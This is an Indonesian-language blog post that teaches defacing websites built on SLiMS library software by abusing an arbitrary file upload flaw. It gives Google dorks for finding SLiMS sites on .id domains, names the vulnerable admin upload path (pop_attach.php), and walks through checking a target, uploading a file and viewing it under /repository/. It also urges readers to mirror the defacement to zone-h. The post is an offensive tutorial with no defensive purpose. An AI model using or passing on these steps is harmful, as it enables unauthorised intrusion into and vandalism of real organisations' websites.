Hallo sob. Kali ini mimin bakalan ngasih tutorial Deface Poc Arbitrary File Upload Vulnerability caranya cukup mudah kok hehe. Dan katanya deface poc ini bisa dimirror ke zone-h loh
Bahan-bahan :
Bahan-bahan :
- File txt / foto
- Hp / PC
- Internet
- Sabun :v
Dork :
intext:''The Winner in the Category of OSS Indonesia ICT Award 2009''
inurl:''index.php?p=show_detail&id='' site:id inurl:''/slims5-meranti/'' site:id
intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009''
Powered by SLiMS site:id
Powered by SLiMS | Design by Indra Sutriadi Pipii
intext:''The Winner in the Category of OSS Indonesia ICT Award 2009''
inurl:''index.php?p=show_detail&id='' site:id inurl:''/slims5-meranti/'' site:id
intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009''
Powered by SLiMS site:id
Powered by SLiMS | Design by Indra Sutriadi Pipii
[ Kembangin lagi gan hehe]
Exploit :
/[patch]/admin/modules/bibliography/pop_attach.php
/[patch]/admin/modules/bibliography/pop_attach.php
- Kita search ke pencarian google dengan dork diatas
- Nah setelah itu cari web yang vuln gan :v
- Cara mengetahui vuln atau tidaknnya tambahin link target dengan exploit diatas
- Cara nambahinnya gimana??
- Gini gan
http://target.com/[patch]/admin/modules/bibliography/pop_attach.php Atau http://target.com/admin/modules/bibliography/pop_attach.php
- Nah seperti itu
- Kalo vuln nanti akan muncul tempat upload filenya gan :v
- Seperti ini
- Nah kalo seperti itu berarti vuln / bisa di entot mhee
- Tinggal kalian upload file txt / foto kalian
- Kalo sudah tinggal kalian klik upload sekarang
- Cara aksesnya gimana??
/[patch]/repository/filemu atau /repository/filemu
Gimana mudahkan?
Semoga bermanfaat. Dan jangan lupa untuk share ke teman-teman kalian agar mereka bisa.
Salam dari saya





0 Comments